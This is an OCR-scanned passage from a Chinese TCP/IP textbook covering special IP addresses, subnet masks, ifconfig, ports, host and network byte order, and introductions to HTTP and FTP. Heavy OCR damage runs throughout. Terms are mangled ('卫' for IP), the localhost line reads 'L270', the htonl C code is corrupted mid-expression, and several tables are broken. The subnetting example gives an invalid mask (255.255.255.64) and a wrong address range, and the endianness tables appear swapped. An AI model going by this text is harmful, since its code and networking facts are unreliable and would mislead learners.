在 IP 地 址 中 有 一 些 特殊 的 地 址 ， 含 义 如 下 : 


主机 ID 全 为 0 的 IP 地 址 ， 它 不 分 配给 任何 主机 ， 仅 用 于 表示 某 个 网 络 的 网 络 地 
址 , 例如 192.168.1.0, 表示 网 络 为 192.168.1.0, 其 中 的 主机 为 192.168.1.1 一 192.168. 
1.254。 

主机 ID 全 为 1 的 卫 地 址 ， 这 个 地 址 也 不 分 配给 任何 主机 ， 仅 用 做 广播 地 址 。 目 
的 地 址 为 这 个 IP 地 址 的 分 组 数据 发 送 给 该 网 络 中 的 所 有 结 点 , 至 于 能 否 执 行 广播 ， 
则 要 依赖 于 其 物理 网 络 是 否 支持 广播 的 功能 。 例 如 ，192.168.1.255 为 网 络 
192.168.1.0 的 广播 值 ， 向 此 IP 地 址 发 送 的 分 组 数据 ， 全 网 络 的 主机 都 接受 。 

IP 地 址 的 32 位 全 为 1 的 地 址 ， 即 255.255.255.255， 为 有 限 广 播 地 址 ， 这 个 地 址 通 
常 由 无 盘 工 作 站 启动 时 使 用 ， 从 网 络 IP 地 址 服务 器 获得 一 个 分 配给 工作 站 的 IP 
地 址 。 

IP 地 址 的 32 位 全 为 0 的 地 址 ( 即 0.0.0.0) ， 表 示 主 机 本 身 ， 发 往 此 IP 地 址 的 数 
据 分 组 由 本 机 接收 。 

IP 地 址 127.0.0.1 是 一 个 特殊 的 回环 接口 ， 它 常用 于 在 本 地 进行 软件 测试 。 例 如 在 
Linux 操作 系统 下 有 一 个 配置 文件 /etc/hosts， 其 中 一 行 代 码 定义 了 localhost 的 IP 
地 址 : 


L270 localhost 


3. 


IP 地 址 的 申请 


在 局 域 网 上 的 一 个 主机 用 户 要 想 接 入 因特网 ， 需 要 获得 授权 的 人 P 地 址 ，IP 地 址 由 他 
地 址 授权 机 构 分 配 ， 此 授权 机 构 通 常 称 为 网 络 信息 中 心 (NIC)。 组 网 用 户 根据 网 络 规模 的 
大 小 ， 向 较 高 层次 的 网 络 管理 中 心 申请 卫 地 址 ; 通常 情况 下 ， 网 络 中 心 根 据 申 请 者 的 规模 


进行 评估 ， 分 配 阁 干 连续 地 址 的 IP 地 址 ， 形 成 一 个 网 络 ID， 网 络 ID 内 部 的 I 人 P 地 址 由 申 


请 者 的 网 络 管理 员 进 行 管理 ， 给 子 网 内 的 各 主机 使 用 。 


。160 。 


第 5 章 ”TCP/IP 协议 族 简介 


例如 中 国 的 大 量 IP 地 址 申请 由 中 国 互联 网 络 信息 中 心 (CNNIC) 受理 , 但 CNNIC 受 
理 的 仅仅 为 批量 的 IP 地 址 ， 例 如 仅 受 理 8 个 C 类 网 络 以 上 的 IP 地 址 申请 ， 并 且 要 保证 一 
定 的 使 用 条 件 ， 申 请 地 址 较 少 的 用 户 ， 需 要 向 附近 的 互联 网 服务 提供 商 〈ISP) 申请 ， 由 
ISP 对 其 申请 到 的 人 P 地 址 进行 再 分 配 。 

教育 网 是 一 个 特殊 的 机 构 ，IP 地 址 可 以 优先 供给 科研 用 途 。 教 育 网 内 卫 的 申请 向 中 
国教 育 科研 网 (edu.cn) 网络 中 心 提交 ， 教 育 网 将 从 亚太 地 区 网 络 中心 (APNIC) 申请 的 
IP 地 址 进行 再 次 分 配 。 


5.3.2 子 网 掩 码 (subnet mask address) 


子 网 掩 码 指 的 是 一 个 32 位 字段 的 数值 ， 利 用 此 字段 来 屏蔽 原来 网 络 地 址 的 划分 情况 ， 
从 而 获得 一 个 范围 较 小 的 、 可 以 实际 使 用 的 网 络 。 


1. 子 网 掩 码 的 含义 


网 络 的 子 网 掩 码 设置 主要 用 来 屏蔽 原来 网 络 的 划分 情况 。 使 用 子 网 掩 码 ， 网 络 设备 可 
以 分 析 得 出 一 个 IP 地 址 的 网 络 地 址 和 子 网 地 址 ， 以 及 主机 地 址 。 网 络 的 路 由 器 根据 目的 地 
址 的 网 络 号 和 子 网 号 可 以 做 出 路 由 寻 址 决策 ，IP 地 址 的 主机 ID 不 参与 路 由 器 的 路 由 寻 址 
操作 ， 它 用 于 在 某 个 网 段 中 识别 一 个 网 络 设备 。 

子 网 抢 码 使 用 与 卫 相同 的 点 分 四 段 式 的 编 址 格式 ， 其 中 值 为 0 的 部 分 对 应 于 IP 地 址 
的 主机 ID 部 分 , 值 为 1 的 部 分 对 应 于 IP 地 址 的 网 络 地 址 部 分 。 子 网 扼 码 与 PP 地 址 进行 与 
运算 后 ， 所 得 到 的 值 为 网 络 地 址 和 子 网 地 址 ， 主 机 ID 部 分 将 不 再 存在 。 利 用 此 特性 可 以 
计算 两 个 IP 地 址 的 网 络 地 址 和 子 网 地 址 判断 是 否 处 于 同一 个 子 网 中 。 

例如 ， 某 个 网 络 IP 分 组 数据 的 目的 地 址 为 192.168.1.151， 如 果 其 子 网 掩 码 为 
255.255.255.128, IP 地 址 与 子 网 拖 码 与 运算 后 的 结果 为 192.168.1.128， 则 该 卫 地 址 的 网 络 
ID 和 子 网 号 的 值 为 192.168.1.128。 

其 实 ， 如 果 网 络 系统 中 只 有 A、B、C 这 3 种 类 型 的 IP 地 址 ， 判 断 IP 地 址 的 第 一 个 字 
节 的 数值 范围 就 可 以 判断 此 IP 地 址 属于 A、B、C 中 的 哪 一 类 网 ， 从 而 得 到 该 IP 地 址 的 网 
络 部 分 和 主机 部 分 ， 不 需要 子 网 抢 码 的 辅助 。3 类 网 的 子 网 拖 码 如 下 : 

口 A 类 地 址 网 络 的 子 网 扒 码 地 址 为 255.0.0.0; 

口 B 类 地 址 网 络 的 子 网 掩 码 地 址 为 255.255.0.0; 

口 C 类 地 址 网 络 的 子 网 掩 码 地 址 为 255.255.255.0。 

子 网 扼 码 主要 有 如 下 用 处 : 

口 便于 网 络 设备 的 尽快 寻 址 ， 区 分 本 网 段 地 址 和 非 本 网 段 的 地 址 。 

口 划分 子 网 ， 进 一 步 缩 小 子 网 的 地 址 空间 ， 充 分 利用 目前 紧缺 的 卫 地 址 。 

2. 利用 子 网 掩 码 确定 网 段 

利用 子 网 掩 码 可 以 确定 两 个 IP 地 址 是 否 属于 同一 个 网 段 。 比 较 两 台 计算 机 的 卫 地 址 
与 子 网 抢 码 进行 与 运算 后 的 值 ， 如 果 结 果 相 同 ， 则 说 明 两 台 计算 机 处 于 同一 个 子 网 络 上 。 
在 以 太 网 结构 的 网 络 中 , 同一 子 网 内 的 两 台 计 算 机 可 以 直接 通信 , 而 不 用 路 由 器 对 IP 分 组 
进行 转发 。 
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例如 ， 主 机 A 的 外 地 址 为 192.168.1.151， 子 网 掩 码 为 255.255.255.128; 主机 B 的 卫 
地 址 为 192.168.1.150， 子 网 掩 码 为 255.255.255.128， 对 两 个 主机 的 计算 如 表 5.7 所 示 。 


表 5.7 A、B 主机 的 网 络 地 址 计算 


主机 (IP/Netmask》 A(192.168.1.151/255.255.255.128) 
IP 地 址 (二进制 ) | 11000000.10101000.00000001.10010111 
子 网 掩 码 (二进制 ) [nnan.ooooooo 

网 络 地 址 〈 二 进 制 ) | 11000000.10101000.00000001.10000000 


B(192.168.1.1S0/2SS.2SS.2SS.128) 
11000000.10101000.00000001.10010111 
1l1111111.11111111.11111111.10000000 

11000000.10101000.00000001.10000000 


对 两 个 主机 的 IP 地 址 和 子 网 扒 码 进行 按 位 与 运算 ， 得 到 两 个 主机 的 网 络 地 址 均 为 
11000000.10101000.00000001.10000000， 即 192.168.1.128， 可 知 两 个 主机 在 同一 个 网 络 上 。 

对 计算 的 过 程 进行 分 析 可 知 ,， 子 网 掩 码 255.255.255.128 的 网 络 上 ,所 有 最 后 一 个 字 节 
的 值 为 128 一 255 的 卫 地 址 与 子 网 掩 码 进 行 运算 的 时 候 ， 其 结果 都 相同 。 可 以 确定 对 于 子 
网 掩 码 为 255.255.255.128 的 子 网 上 , IP 地 址 从 192.168.1.128 一 192.168.1.255 都 在 同一 个 子 
网 192.168.1.128 上 。 由 于 192.168.1.128 地 址 用 于 表示 网 络 ，192.168.1.255 用 于 广播 ， 所 
以 实际 可 用 的 人 地址 数量 为 128-2=126 个 。 


3. 用 子 网 掩 码 进行 网 络 划分 


使 用 A、B、C 类 进行 IP 地 址 划分 的 方法 对 目前 有 限 的 IP 地 址 来 说 有 点 浪费 ， 所 以 出 
现 了 使 用 子 网 掩 码 进行 网 络 划 分 的 方法 。 使 用 子 网 掩 码 进行 网 络 划 分 的 基本 原理 是 子 网 拖 
码 与 卫 地 址 与 运算 结果 相同 的 IP 地 址 在 同一 个 网 络 上 。 

例如 ， 有 50 个 主机 ， 需 要 为 其 划 定 网 络 ， 而 目前 IP 地 址 段 空 闲 的 为 192.168.1.0。 如 
果 全 部 使 用 上 述 的 地 址 段 ，50 个 主机 占用 254 个 有 用 地 址 显然 太 浪费 了 ， 可 以 对 网 络 地 址 
192.168.1.0 进行 重新 划分 ， 建 立 一 个 能 够 容纳 50 个 主机 的 网 络 。 

口 首先 计算 需要 的 IP 地 址 ，50 个 主机 占用 50 个 IP 地 址 ， 加 上 1 个 网 络 地 址 和 1 个 

广播 地 址 ， 建 立 网 络 需 要 IP 地 址 52 个 。 

口 子 网 抢 码 的 数值 通常 以 2 的 n 次 方 进行 取 值 ， 所 以 取 掩 码 值 为 64。 

口 子 网 抢 码 为 255.255.255.64，IP 地 址 的 范围 是 192.168.1.0 一 192.168.1.64， 最 多 可 

以 容纳 64 个 主机 ， 可 以 满足 50 个 主机 的 需要 。 


5.3.3 ”IP 地 址 的 配置 

在 Linux 下 ， 进 行 网 络 配置 的 命令 是 ifconfig， 它 用 于 显示 、 设 置 网 络 设备 的 IP 地 址 
和 子 网 抢 码 。ifconfig 的 命令 格式 为 : 

ifconfig 网 络 编号 IP 地 址 netmask 子 网 掩 码 


将 当前 主机 的 网 络 设备 eth0 配置 成 IP 地 址 为 192.168.1.151， 子 网 掩 码 为 
255.255.255.128。 命 令 为 : 

#ifconfig eth0 192.168.1.151 netmask 255.255.255.128 

配置 完毕 后 可 以 使 用 ifconfig 命令 进行 查看 ， 不 带 参数 时 ， 会 显示 所 有 激活 的 网 络 接 
口 的 当前 配置 信息 。 
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5.3.4 端口 


TCP 和 UDP 协议 是 以 人 P 协 议 为 基础 的 传输 ， 为 了 方便 多 种 应 用 程序 ， 区 分 不 同 应 用 
程序 的 数据 和 状态 ， 引 入 了 端口 的 概念 。 

端口 是 一 个 16 位 的 整数 类 型 值 ， 通 常 称 这 个 值 为 端口 号 。 如 果 是 服务 程序 ， 则 需要 
对 某 个 端口 进行 绑 定 , 这 样 某 个 客户 端 可 以 访问 本 主机 上 的 此 端口 来 与 应 用 程序 进行 通信 。 
由 于 卫 地 址 只 能 对 主机 进行 区 分 , 而 加 上 端口 号 就 可 以 区 分 此 主机 上 的 应 用 程序 。 实 际 上 ， 
IP 地址 和 端口 号 的 组 合 ， 可 以 确定 在 网 络 上 的 一 个 程序 通路 ， 端 口号 实际 上 是 操作 系统 标 
识 应 用 程序 的 一 种 方法 。 

端口 号 的 值 可 由 用 户 自 定义 或 者 由 系统 分 配 ， 采 用 动态 系统 分 配 和 静态 用 户 自 定义 相 
结合 的 办 法 。 一 些 常 用 的 服务 程序 使 用 固定 的 静态 端口 号 ， 例 如 ，Web 服务 器 的 端口 号 为 
80， 电 子 邮 件 SMTP 的 端口 号 为 25， 文 件 传输 FTP 的 端口 号 为 20 和 21 等 。 

对 于 其 他 的 应 用 服务 ， 特 别 是 用 户 自 行 开发 的 客户 端 应 用 程序 ， 端 口号 采用 动态 分 配 
方法 ， 其 端口 号 由 操作 系统 自动 分 配 。 通 常情 况 下 ， 对 端口 的 使 用 有 如 下 约定 ， 小 于 1024 
的 端口 为 保留 端口 ， 由 系统 的 标准 服务 程序 使 用 ，1024 以 上 的 端口 号 ， 用 户 应 用 程序 可 以 
使 用 。 如 图 5.30 所 示 为 Linux 下 常用 的 端口 及 绑 定 的 服务 。 

<1023[ Name 


FTP 数 据 
区 Named | | Bootp | | TFTP Telnet | | FTP 命 令 端口 端口 SMTP || HTTP | <1023 


>1023| 用 户 程序 ~、 用 户 程序 >1023 


UDP UDP 


以 太 网 
图 5.30 Linux 下 常用 服务 的 端口 号 


在 Linux 系统 的 文件 /etc/services 中 列 出 了 系统 提供 的 服务 , 以 及 各 服务 的 端口 号 等 信息 。 


5.4 主机 字 节 序 和 网 络 字 节 序 


在 使 用 网 络 进行 程序 设计 中 会 碰 到 的 一 个 问题 是 字 节 序 的 问题 ， 这 在 基于 单机 或 者 同 
类 型 机 器 进行 开发 的 过 程 中 很 少 遇 到 。 由 于 网 络 的 特点 是 将 Internet 上 不 同 的 网 络 设备 和 
主机 进行 连接 和 通信 ， 这 决定 了 使 用 网 络 进行 开发 的 程序 的 特点 就 是 要 兼容 各 种 类 型 的 设 
备 , 其 中 的 数据 在 不 同 的 设备 上 要 有 唯一 的 含义 。 字 节 序 的 问题 是 上 述 情况 下 的 典型 问题 。 
5.4.1 字 节 序 的 含义 


字 节 序 的 问题 是 由 于 CPU 对 整数 在 内 存 中 的 存放 方式 造成 的 ,多 于 一 个 字 节 的 数据 类 
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型 在 内 存 中 的 存放 顺序 叫 主机 字 节 序 。 最 常见 的 字 节 序 有 两 种 , 小 端 字 节 序 和 大 端 字 节 序 。 
口 小 端 字 节 序 : 即 Little Endian， 简 称 LE， 将 数据 的 最 低 字 节 放 在 内 存 的 起 始 位 置 。 
小 端 字 节 序 的 特点 是 内 存 地 址 较 低 的 位 存放 数据 的 低位 ， 内 存 地 址 高 的 位 存放 数 
据 的 高 位 ， 与 思维 习惯 一 致 。 采 用 低 字 节 序 的 CPU 有 x86 架构 的 Intel 系列 产品 。 
口 大 端 字 节 序 : 即 Big Endian， 简 称 BE， 将 数据 的 高 字 节 放 在 内 存 的 起 始 位 置 。 大 
端 字 节 序 的 特点 是 内 存 中 低 字 节 位 置 存放 数据 的 高 位 字 节 ， 内 存 中 的 高 位 字 节 存 
放 数 据 的 较 低 字 节 数 据 ， 与 思维 习惯 不 一 致 。 但 是 与 实际 数据 的 表达 方式 是 一 致 
的 。 如 果 将 内 存 中 的 数据 直接 存放 在 文件 中 ， 打 开 文 件 查看 会 发 现 和 原来 的 数据 
的 高 低位 一 致 。 采 用 大 端 字 节 序 的 典型 的 代表 有 PowerPC 的 UNIX 系统 。 
例如 ,对 于 一 个 8 位 字 节 的 数据 0x12345678, 假设 在 内 存 中 存放 的 开始 地 址 为 0x1000， 
则 在 小 端 字 节 序 系统 和 大 端 字 节 序 系统 中 的 方式 如 表 5.8 所 示 。 


表 5.8 数据 在 小 端 字 节 序 和 大 端 字 节 序 系统 中 的 差别 


内 存 地 址 0x1003 
小 端 字 节 序 0x12 
大 端 字 节 序 0x78 


而 如 果 将 0x12345678 写 入 内 存 地 址 0x1000 开始 的 地 方 ， 在 内 存 中 的 值 为 表 5.9 所 示 
的 形式 。 
表 5.9 数据 在 小 端 字 节 序 和 大 端 字 节 序 系统 中 的 差别 


内 存 地 址 大 端 字 节 序 
Ox1000 0x78 
Oxo0 0x56 
Ox1002 034 
Ox1003 0x12 


系统 对 多 字 节 数据 的 不 同 存 放 方 法 造成 了 使 用 方法 的 问题 ， 例 如 ， 在 x86 系统 主机 A 
上 的 一 个 值 为 0x12345678， 数 据 通过 网 络 传送 到 PowerPC 上 的 一 个 运行 UNIX 的 主机 B 
上 , 在 B 上 此 值 解释 为 0x78563412, 与 原来 的 数据 巡 异 ， 这 样 就 造成 了 传输 上 兼容 性 方面 
的 困难 。 


5.4.2 ”网 络 字 节 序 的 转换 


网 络 的 字 节 序 标准 规定 为 大 端 字 节 序 ， 不 同 平台 上 会 对 主机 字 节 序 进行 转化 后 再 进行 
传送 ， 到 主机 后 再 转化 为 主机 字 节 序 ， 数 据 的 传输 就 不 会 产生 传输 造成 的 问题 了 。 同 一 个 
数据 在 不 同 的 平台 上 可 以 使 用 网 络 字 节 序 的 转换 函数 来 实现 。 

如 图 5.31 所 示 为 主机 A 中 的 应 用 程序 将 变量 a 中 的 值 0x12345678， 通 过 网 络 传递 给 
主机 B 中 的 应 用 程序 中 的 变量 b， 如 果 不 进行 网 络 字 节 序 转换 ，b 的 值 为 0x78563412。 

如 图 5.32 所 示 ， 如 果 进 行 网 络 字 节 序 转换 ，a 的 值 与 b 的 值 均 为 0x12345678 。 
进行 网 络 字 节 序 转换 的 函数 有 htons0)、ntohs(0)、htonl0)、ntohl0) 等 ， 其 中 s 是 short 数 
据 类 型 的 意思 ，1 是 long 数据 类 型 的 意思 ， 而 h 是 host， 即 主机 的 意思 ，n 是 network， 即 
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主机 _A 主机 _B 
小 端 字 节 序 7 AN 大 端 字 节 序 
变量 变量 \ 
12345678 
低 高 低 高 
ox7s|0xs6 0x34|0x12 0x78|0x56|0x34|ox12 


网 络 接收 
以 太 网 
图 5.31 不 进行 网 络 字 节 序 转换 的 传递 数据 
主机 A 主机 B 
小 端 字 节 序 大 端 字 节 序 
变 最 0x12345678 
低 高 低 高 


Ox78 | 0x56 | 0x34 | 0x12 


网 络 字 交 序 转 序 转换 | 
低 高 低 高 
Ox12 |0x34 |0x56 | 0x78 Ox12 |0x34 |0x56 |0x78 
网 络 接收 ”~ 


以 太 网 
图 5.32 通过 网 络 字 节 序 转换 在 网 络 间 传递 数据 


网 络 的 意思 。 以 上 4 个 函数 分 别 如 下 。 
口 htons(): 表示 对 于 short 类 型 的 变量 ， 从 主机 字 节 序 转换 为 网 络 字 节 序 。 
口 ntohs(): 表示 对 于 short 类 型 的 变量 ， 从 网 络 字 节 序 转换 为 主机 字 节 序 。 
口 htonl0: 表示 对 于 long 类 型 的 变量 ， 从 主机 字 节 序 转换 为 网 络 字 节 序 。 
口 ntohl0: 表示 对 于 long 类 型 的 变量 ， 从 网 络 字 节 序 转换 为 主机 字 节 序 。 
字 节 序 的 转换 函数 并 没有 转换 符号 类 型 变量 ， 是 否 为 符号 类 型 是 由 应 用 程式 来 确定 


“GS. 
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的 ， 与 字 节 序 无 关 。 
字 节 序 转换 函数 在 不 同 平台 上 的 实现 是 不 同 的 ， 如 对 于 long 类 型 的 转换 ， 小 端 主机 字 
节 序 的 平台 要 进行 转换 ， 而 在 大 端 主机 字 节 序 的 平台 上 是 不 需要 进行 转换 的 。 例 如 下 面 的 
实现 方式 可 以 兼容 不 同 的 平台 : 
#if ISLE 
/* 小 端 字 节 序 平台 调用 此 部 分 代码 */ 
long htonl (long value) 
{ 
/* 进 行 转换 , 即位 置 0x12345678 转换 位 置 一 0x78563412*/ 
return( (value 并 有志 24) | ((value << 8)&0x00FF0000) | ((value >> 
8)&0x0000FF00) | (value >> 24)); 


} 
#else if ISBE 


/* 大 端 字 节 序 平台 调用 此 部 分 代码 */ 
long htonl (long value) 


/* 由 于 大 端 字 节 序 平台 与 网 络 字 节 序 一 致 ,不 需要 进行 转换 */ 
return value; 
} 
#endif 
不 同 的 平台 的 实现 代码 是 不 同 的 部 分 。 其 他 函数 的 实现 与 此 类 似 ,注意 htons() 和 ntohs() 
函数 及 htonl0 和 ntohl0) 函 数 是 对 应 的 转换 ， 两 个 函数 完全 可 以 使 用 同一 套 代码 ， 例 如 : 


#define ntohl htonl 
5.5 小 结 


ISO/OSI 网 络 模 型 是 进行 网 络 研究 的 基础 ， 该 模型 对 各 层 之 间 的 功能 进行 了 抽象 ， 仔 
细 地 研究 此 模型 会 对 网 络 协 议 栈 的 本 质 有 更 深入 的 了 解 。TCP 和 UDP 协议 是 应 用 程序 设 
计 中 最 常 使 用 的 两 种 协议 。 TCP 是 可 靠 的 协议 , 用 很 多 机 制 来 保证 数据 传输 的 可 靠 性 UDP 
则 是 一 种 不 可 靠 的 协议 ， 在 实际 使 用 过 程 中 ， 发 送 端的 数据 如 果 在 接收 端 没 有 及 时 地 从 协 
议 栈 缓冲 区 取出 ， 有 可 能 被 之 后 到 达 的 数据 冲 掉 。 

ICMP 是 网 络 控制 协议 ， 用 于 发 送 网 络 的 诊断 、 错 误 、 控 制 信息 。ARP 则 是 地 址 解析 
协议 ， 获 得 IP 地 址 对 应 的 硬件 地 址 ， 与 RARP 协议 如 ARP 相反 的 协议 ， 叫 逆 地 址 解析 协 
议 ， 获 得 硬件 地 址 对 应 的 IP 地 址 ， 通 常用 于 无 盘 工作 站 。 

IP 地 址 是 一 种 点 分 四 段 式 的 数据 ， 表 示 一 个 主机 在 Internet 上 的 网 络 位 置 ， 主 要 用 于 
跨 网 主机 的 识别 。 抢 码 用 于 快速 寻 址 和 网 络 划 分 。 
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在 第 5 章 中 对 TCP/IP 协议 栈 进行 了 简单 的 介绍 ， 操 作 系 统 中 有 很 多 默认 的 网 络 服务 
或 者 客户 端 程序 ， 例 如 Web 服务 器 和 浏览 器 、FTP 服务 器 和 客户 端 、Telnet 服务 器 和 客户 
端 等 ， 在 Linux 环境 下 有 Apache、Mozilla、VSFtp 等 。 本 章 将 对 这 些 程序 的 协议 和 使 用 进 
行 介绍 ， 主 要 包括 以 下 内 容 : 

口 HTTP 协议 及 服务 ， 主 要 介绍 HTTP 协议 的 标准 和 应 用 ; 

口 介绍 FTP 协议 标准 ， 并 介绍 FTP 客户 端的 使 用 ; 

口 对 TELNET 的 协议 标准 进行 简介 ; 

口 介绍 Linux 下 网 络 服务 的 配置 方法 。 


6.1 HTTP 协议 和 服务 


HTTP 协议 是 目前 应 用 最 广泛 的 应 用 层 网 络 协议 ， 它 是 目前 互联 网 繁荣 的 基础 。 本 节 
将 对 HTTP 协议 进行 简单 的 介绍 。 


6.1.1 HTTP 协议 概述 


应 用 层 协 议 HTTP 是 Web 的 核心 .HTTP 协议 在 Web 的 客户 端 程序 和 服务 器 程序 中 得 
以 实现 ， 运 行 在 不 同系 统 上 的 客户 端 程序 和 服务 器 程序 ， 通 过 交换 HTTP 消息 彼此 交流 。 
HTTP 协议 定义 数据 格式 ， 使 得 服务 器 和 客户 端 通过 协议 进行 数据 交流 。 

Web 页 面 (web page， 也 称 为 文档 ) 是 客户 端 和 服务 器 交流 的 基本 内 容 ， 它 由 多 个 对 
象 构成 。 对 象 (object) 是 可 由 URL 进行 寻 址 的 文件 ， 例 如 HTML 文件 、JPG 图 像 、GIF 
图 像 、Java 小 应 用 程序 、 语 音 片段 等 。 

Web 页 面 大 多 数 由 一 个 基本 HTML 文件 和 很 多 HTML 文件 中 所 引用 的 对 象 构成 。 例 
如 ， 如 果 某 个 Web 页 面包 含 1 个 HTML 文本 文件 和 5 个 PNG 图 像 ， 这 个 Web 页 面 就 由 6 
个 对 象 构成 ， 即 基本 HTML 文件 加 5 个 图 像 。 这 个 基本 的 HTML 文件 使 用 文件 中 的 内 置 
URL 来 引用 本 页 面 中 所 使 用 的 其 他 对 象 ， 例 如 上 述 的 5 个 PNG 图 像 需 要 在 基本 HTML 文 
件 中 进行 URL 的 引用 定义 。 

一 个 URL 由 两 部 分 构成 : 存放 该 对 象 的 服务 器 主机 名 和 该 对 象 的 路 径 名 。 例 如 ， 在 
如 下 的 URL 中 : 


roll.mil.news.sina.com.cn/phototj slide/146/index.shtml 


roll.mil.news.sina.com.cn 是 一 个 主机 名 ，/phototj_slide/146/index.shtml 是 一 个 路 径 名 。 
浏览 器 是 Web 的 用 户 代理 ， 它 显示 所 请 求 的 Web 页 面 ， 并 提供 大 量 的 导航 与 配置 特 
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性 。Web 浏览 器 还 实现 HTTP 的 客户 端 ， 因 此 在 Web 上 下 文中 ， 可 以 从 进程 意义 上 互 换 使 
用 “浏览 器 ”和 “客户 ”两 词 。 

流行 的 Web 浏览 器 有 Google Chrome、Firefox 和 微软 的 IE 等 。Web 服务 器 存放 可 由 
URL 寻 址 的 Web 对 象 Web 服务 器 还 实现 HTTP 的 服务 器 端 ,流行 的 Web 服务 器 有 Apache、 
微软 的 IIS 以 及 IBM WebSphere。 


6.1.2 HTTP 协议 的 基本 过 程 

HTTP 协议 是 基于 客户 端 /服务 器 之 间 的 请 求 响应 进行 交互 的 。 

1. HTTP 协议 的 宏观 过 程 

一 个 客户 端 与 服务 器 建立 连接 后 ， 发 送 一 个 请 求 给 服务 器 ， 请 求 方式 的 格式 为 ， 统 一 
资源 标识 符 、 协议 版 本 号 , 后 边 是 MIME 信息 包括 请 求 修饰 符 、 客 户 端 信息 和 可 能 的 内 容 。 

服务 器 接 到 客户 端的 请 求 后 ， 向 客户 端 发 送 相应 的 响应 信息 ， 其 格式 为 : 一 个 状态 行 
包括 信息 的 协议 版 本 号 、 一 个 成 功 或 错误 的 代码 ， 后 边 是 MIME 信息 包括 服务 器 信息 、 实 
体 信息 和 可 能 的 内 容 。 

如 图 6.1 所 示 ， 为 一 个 客户 端 和 服务 器 之 间 的 HTTP 协议 访问 基本 过 程 。 


请 求 


AS 连接 


用 户 一 响应 服务 器 


图 6.1 客户 端 和 服务 器 之 间 的 HTTP 协议 基本 框架 


在 Internet 上 ，HTTP 通信 通常 发 生 在 TCP/IP 连接 之 上 。 默 认 端 口 是 TCP 协议 的 80 
端口 ， 其 他 端口 也 是 可 用 的 。 但 这 并 不 是 说 HTTP 协议 在 Internet 或 其 他 网 络 的 其 他 协议 
之 上 可 以 完成 ，HTTP 只 能 在 TCP 协议 的 基础 之 上 进行 传输 。 

在 WWW 中 ,“ 客 户 ” 与 “服务 器 ”是 一 个 相对 的 概念 ， 这 个 概念 只 在 某 个 连接 中 有 
效 , 某 个 连接 中 的 客户 在 另 一 个 场景 中 可 能 是 服务 器 WWW 服务 器 运行 时 , 一 直 在 TCP80 
端口 (WWW 的 默认 端口 ) 监听 ， 等 待 连接 请 求 的 出 现 。 


2. HTTP 协议 的 内 部 过 程 


以 上 简要 介绍 了 HTTP 协议 的 概要 运作 方式 ， 下 面 对 HTTP 协议 的 内 部 操作 过 程 进行 
详细 介绍 。 

首先 ， 简 单 介绍 基于 HTTP 协议 的 客户 /服务 器 模式 的 信息 交换 过 程 ， 如 图 6.2 所 示 ， 
它 分 4 个 过 程 : 建立 连接 、 发 送 请 求 信息 、 发 送 响应 信息 、 关 闭 连接 。 

(1) 建立 连接 。 连 接 的 建立 是 通过 申请 套 接 字 〈Socket) 实现 的 。 客 户 打 开 一 个 套 接 
字 并 把 它 绑 定 在 一 个 端口 上 ， 如 果 成 功 ， 就 相当 于 建立 了 一 个 虚拟 文件 。 


» Ms 
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用 户 关闭 这 所 服务 器 


图 6.2 客户 端 和 服务 器 之 间 的 HTTP 请 求 响应 的 过 程 


(2) 发 送 请 求 。 打 开 一 个 连接 后 ， 客 户 端 把 请 求 消息 送 到 服务 器 的 监听 端口 上 ， 完 成 
提出 请 求 动 作 。 

HTTP/1.0 请 求 消息 的 格式 为 : 

请 求 消息 = 请 求 行 (通用 信息 1 请 求 头 | 实体 头 ) CRLF [实体 内 容 ] 

请 求 行 ”= 方法 请求 URL HTTP 版 本 号 CRLF 

方法 =GET|HEAD|POST| 扩 展 方法 

URL = 协议 名 称 + 宿主 名 + 目录 与 文件 名 


请 求 行 中 的 方法 用 于 HTTP 的 动作 方式 ， 常 用 的 方法 有 GET、HEAD 和 POST。 不同 
的 请 求 对 象 对 应 GET 的 结果 是 不 同 的 ， 对 应 关系 如 下 : 


对 象 GET 的 结果 
文件 文件 的 内 容 
程序 该 程序 的 执行 结果 


数据 库 查询 查询 结果 


HEAD 方法 要 求 服务 器 查找 某 对 象 的 元 信息 ， 而 不 是 对 象 本 身 。 
POST 方法 从 客户 端 向 服务 器 传送 数据 ，POST 发 送 的 数据 被 服务 器 接收 后 进行 处 理 。 
-个 请 求 的 例子 如 下 : 


GEThttp://networking.zju.edu.cn/zju/index.htmHTTP/1.0 


头 信息 又 称 为 元 信息 ， 即 信息 的 信息 ， 利 用 元 信息 可 以 实现 有 条 件 的 请 求 或 应 答 。 

请 求 头 一 一 告诉 服务 器 怎样 解释 本 次 请 求 ， 主 要 包括 用 户 可 以 接受 的 数据 类 型 、 压 缩 
方法 和 语言 等 。 

实体 头 一 一 实体 信息 类 型 、 长 度 、 压 缩 方法 、 最 后 一 次 修改 时 间 、 数 据 有 效 期 等 。 

实体 一 一 请 求 或 应 答对 象 本 身 。 

(3) 发 送 响应 。 服 务 器 在 处 理 完 客户 的 请 求 之 后 ， 要 向 客户 端 发 送 响应 消息 。 

HTTP/1.0 的 响应 消息 格式 如 下 : 


响应 消息 = 状态 行 (通用 信息 头 | 响应 头 | 实体 头 ) ”CRLF 【实体 内 容 ) 
状态 行 =HTTP 版 本 号 ”状态 码 ”原因 叙述 


状态 码 表 示 响 应 类 型 
1xx 保留 


2XX ”表示 请 求 成 功 地 接收 

3XX ”为 完成 请 求 客户 需 进 一 步 细 化 请 求 
4XX 客户 错误 

5XX 服务 器 错误 


“I 
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响应 头 的 信息 包括 : 服务 程序 名 、 通 知客 户 请 求 的 URL 需要 认证 、 请 求 的 资源 何 时 
能 使 用 。 
(4) 关闭 连接 。 客 户 和 服务 器 双方 都 可 以 通过 关闭 套 接 字 来 结束 TCP/IP 对 话 。 


6.2 FTP 协议 和 服务 


FTP 协议 英文 全 称 为 File Transfer Protocol， 简 称 FTP， 是 一 种 从 一 个 主机 向 另 一 个 主 
机 传送 文件 的 协议 。FTP 协议 的 历史 可 以 追溯 到 1971 年 ， 不 过 至 今 仍然 极为 流行 ，FTP 
协议 在 RFC959 中 进行 了 详细 的 说 明 。 


6.2.1 FTP 协议 概述 


FTP 协议 中 客户 端 与 服务 器 端 进 行文 件 传输 的 交互 方式 如 图 6.3 所 示 , 客户 端 包含 用 
户 接口 和 客户 端 接口 ， 服 务 器 端 为 FTP 服务 器 ， 客 户 端 和 服务 器 端 都 与 文件 系统 进行 


交互 。 
曲 - 一 FTP 用 户 接口 FTP 客 户 端 接 [ 二 - 一 一 一 | FTP 服务 器 
se 2 网 络 


本 地 文件 系统 文件 系统 


图 6.3 FTP 协议 在 本 地 和 远程 服务 器 之 间 传 送 文件 


